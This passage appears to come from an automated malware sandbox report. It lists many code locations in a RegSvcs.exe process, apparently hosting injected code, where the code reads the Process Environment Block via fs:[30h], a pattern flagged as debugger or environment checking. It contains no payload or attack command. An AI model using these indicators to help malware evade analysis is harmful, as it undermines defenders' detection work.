Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F1B8F mov eax, dword ptr fs:[00000030h] 6_2_017F1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01813B7A mov eax, dword ptr fs:[00000030h] 6_2_01813B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01813B7A mov eax, dword ptr fs:[00000030h] 6_2_01813B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181D294 mov eax, dword ptr fs:[00000030h] 6_2_0181D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181D294 mov eax, dword ptr fs:[00000030h] 6_2_0181D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181FAB0 mov eax, dword ptr fs:[00000030h] 6_2_0181FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E9240 mov eax, dword ptr fs:[00000030h] 6_2_017E9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E9240 mov eax, dword ptr fs:[00000030h] 6_2_017E9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E9240 mov eax, dword ptr fs:[00000030h] 6_2_017E9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E9240 mov eax, dword ptr fs:[00000030h] 6_2_017E9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01812ACB mov eax, dword ptr fs:[00000030h] 6_2_01812ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01812AE4 mov eax, dword ptr fs:[00000030h] 6_2_01812AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4AEF mov eax, dword ptr fs:[00000030h] 6_2_018A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EAA16 mov eax, dword ptr fs:[00000030h] 6_2_017EAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EAA16 mov eax, dword ptr fs:[00000030h] 6_2_017EAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E5210 mov eax, dword ptr fs:[00000030h] 6_2_017E5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E5210 mov ecx, dword ptr fs:[00000030h] 6_2_017E5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E5210 mov eax, dword ptr fs:[00000030h] 6_2_017E5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E5210 mov eax, dword ptr fs:[00000030h] 6_2_017E5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F8A0A mov eax, dword ptr fs:[00000030h] 6_2_017F8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01803A1C mov eax, dword ptr fs:[00000030h] 6_2_01803A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AAA16 mov eax, dword ptr fs:[00000030h] 6_2_018AAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AAA16 mov eax, dword ptr fs:[00000030h] 6_2_018AAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A229 mov eax, dword ptr fs:[00000030h] 6_2_0180A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A229 mov eax, dword ptr fs:[00000030h] 6_2_0180A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A229 mov eax, dword ptr fs:[00000030h] 6_2_0180A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A229 mov eax, dword ptr fs:[00000030h] 6_2_0180A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A229 mov eax, dword ptr fs:[00000030h] 6_2_0180A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A229 mov eax, dword ptr fs:[00000030h] 6_2_0180A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A229 mov eax, dword ptr fs:[00000030h] 6_2_0180A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A229 mov eax, dword ptr fs:[00000030h] 6_2_0180A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180A229 mov eax, dword ptr fs:[00000030h] 6_2_0180A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01824A2C mov eax, dword ptr fs:[00000030h] 6_2_01824A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01824A2C mov eax, dword ptr fs:[00000030h] 6_2_01824A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FAAB0 mov eax, dword ptr fs:[00000030h] 6_2_017FAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FAAB0 mov eax, dword ptr fs:[00000030h] 6_2_017FAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01874257 mov eax, dword ptr fs:[00000030h] 6_2_01874257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E52A5 mov eax, dword ptr fs:[00000030h] 6_2_017E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E52A5 mov eax, dword ptr fs:[00000030h] 6_2_017E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E52A5 mov eax, dword ptr fs:[00000030h] 6_2_017E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E52A5 mov eax, dword ptr fs:[00000030h] 6_2_017E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E52A5 mov eax, dword ptr fs:[00000030h] 6_2_017E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AEA55 mov eax, dword ptr fs:[00000030h] 6_2_018AEA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0189B260 mov eax, dword ptr fs:[00000030h] 6_2_0189B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0189B260 mov eax, dword ptr fs:[00000030h] 6_2_0189B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B8A62 mov eax, dword ptr fs:[00000030h] 6_2_018B8A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0182927A mov eax, dword ptr fs:[00000030h] 6_2_0182927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01812581 mov eax, dword ptr fs:[00000030h] 6_2_01812581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01812581 mov eax, dword ptr fs:[00000030h] 6_2_01812581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01812581 mov eax, dword ptr fs:[00000030h] 6_2_01812581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01812581 mov eax, dword ptr fs:[00000030h] 6_2_01812581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A2D82 mov eax, dword ptr fs:[00000030h] 6_2_018A2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A2D82 mov eax, dword ptr fs:[00000030h] 6_2_018A2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A2D82 mov eax, dword ptr fs:[00000030h] 6_2_018A2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A2D82 mov eax, dword ptr fs:[00000030h] 6_2_018A2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A2D82 mov eax, dword ptr fs:[00000030h] 6_2_018A2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A2D82 mov eax, dword ptr fs:[00000030h] 6_2_018A2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A2D82 mov eax, dword ptr fs:[00000030h] 6_2_018A2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181FD9B mov eax, dword ptr fs:[00000030h] 6_2_0181FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181FD9B mov eax, dword ptr fs:[00000030h] 6_2_0181FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018135A1 mov eax, dword ptr fs:[00000030h] 6_2_018135A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B05AC mov eax, dword ptr fs:[00000030h] 6_2_018B05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B05AC mov eax, dword ptr fs:[00000030h] 6_2_018B05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01811DB5 mov eax, dword ptr fs:[00000030h] 6_2_01811DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01811DB5 mov eax, dword ptr fs:[00000030h] 6_2_01811DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01811DB5 mov eax, dword ptr fs:[00000030h] 6_2_01811DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F3D34 mov eax, dword ptr fs:[00000030h] 6_2_017F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017EAD30 mov eax, dword ptr fs:[00000030h] 6_2_017EAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866DC9 mov eax, dword ptr fs:[00000030h] 6_2_01866DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866DC9 mov eax, dword ptr fs:[00000030h] 6_2_01866DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866DC9 mov eax, dword ptr fs:[00000030h] 6_2_01866DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866DC9 mov ecx, dword ptr fs:[00000030h] 6_2_01866DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866DC9 mov eax, dword ptr fs:[00000030h] 6_2_01866DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866DC9 mov eax, dword ptr fs:[00000030h] 6_2_01866DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AFDE2 mov eax, dword ptr fs:[00000030h] 6_2_018AFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AFDE2 mov eax, dword ptr fs:[00000030h] 6_2_018AFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AFDE2 mov eax, dword ptr fs:[00000030h] 6_2_018AFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AFDE2 mov eax, dword ptr fs:[00000030h] 6_2_018AFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01898DF1 mov eax, dword ptr fs:[00000030h] 6_2_01898DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FD5E0 mov eax, dword ptr fs:[00000030h] 6_2_017FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017FD5E0 mov eax, dword ptr fs:[00000030h] 6_2_017FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0186A537 mov eax, dword ptr fs:[00000030h] 6_2_0186A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018AE539 mov eax, dword ptr fs:[00000030h] 6_2_018AE539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01814D3B mov eax, dword ptr fs:[00000030h] 6_2_01814D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01814D3B mov eax, dword ptr fs:[00000030h] 6_2_01814D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01814D3B mov eax, dword ptr fs:[00000030h] 6_2_01814D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B8D34 mov eax, dword ptr fs:[00000030h] 6_2_018B8D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01823D43 mov eax, dword ptr fs:[00000030h] 6_2_01823D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01863540 mov eax, dword ptr fs:[00000030h] 6_2_01863540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01893D40 mov eax, dword ptr fs:[00000030h] 6_2_01893D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01807D50 mov eax, dword ptr fs:[00000030h] 6_2_01807D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E2D8A mov eax, dword ptr fs:[00000030h] 6_2_017E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E2D8A mov eax, dword ptr fs:[00000030h] 6_2_017E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E2D8A mov eax, dword ptr fs:[00000030h] 6_2_017E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E2D8A mov eax, dword ptr fs:[00000030h] 6_2_017E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017E2D8A mov eax, dword ptr fs:[00000030h] 6_2_017E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180C577 mov eax, dword ptr fs:[00000030h] 6_2_0180C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180C577 mov eax, dword ptr fs:[00000030h] 6_2_0180C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A4496 mov eax, dword ptr fs:[00000030h] 6_2_018A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B8CD6 mov eax, dword ptr fs:[00000030h] 6_2_018B8CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A14FB mov eax, dword ptr fs:[00000030h] 6_2_018A14FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866CF0 mov eax, dword ptr fs:[00000030h] 6_2_01866CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866CF0 mov eax, dword ptr fs:[00000030h] 6_2_01866CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866CF0 mov eax, dword ptr fs:[00000030h] 6_2_01866CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B740D mov eax, dword ptr fs:[00000030h] 6_2_018B740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B740D mov eax, dword ptr fs:[00000030h] 6_2_018B740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018B740D mov eax, dword ptr fs:[00000030h] 6_2_018B740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_018A1C06 mov eax, dword ptr fs:[00000030h] 6_2_018A1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866C0A mov eax, dword ptr fs:[00000030h] 6_2_01866C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866C0A mov eax, dword ptr fs:[00000030h] 6_2_01866C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866C0A mov eax, dword ptr fs:[00000030h] 6_2_01866C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_01866C0A mov eax, dword ptr fs:[00000030h] 6_2_01866C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181BC2C mov eax, dword ptr fs:[00000030h] 6_2_0181BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0181A44B mov eax, dword ptr fs:[00000030h] 6_2_0181A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0187C450 mov eax, dword ptr fs:[00000030h] 6_2_0187C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0187C450 mov eax, dword ptr fs:[00000030h] 6_2_0187C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_017F849B mov eax, dword ptr fs:[00000030h] 6_2_017F849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180746D mov eax, dword ptr fs:[00000030h] 6_2_0180746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 6_2_0180B477 mov eax, dword ptr fs:[00000030h] 6_2_0180B477
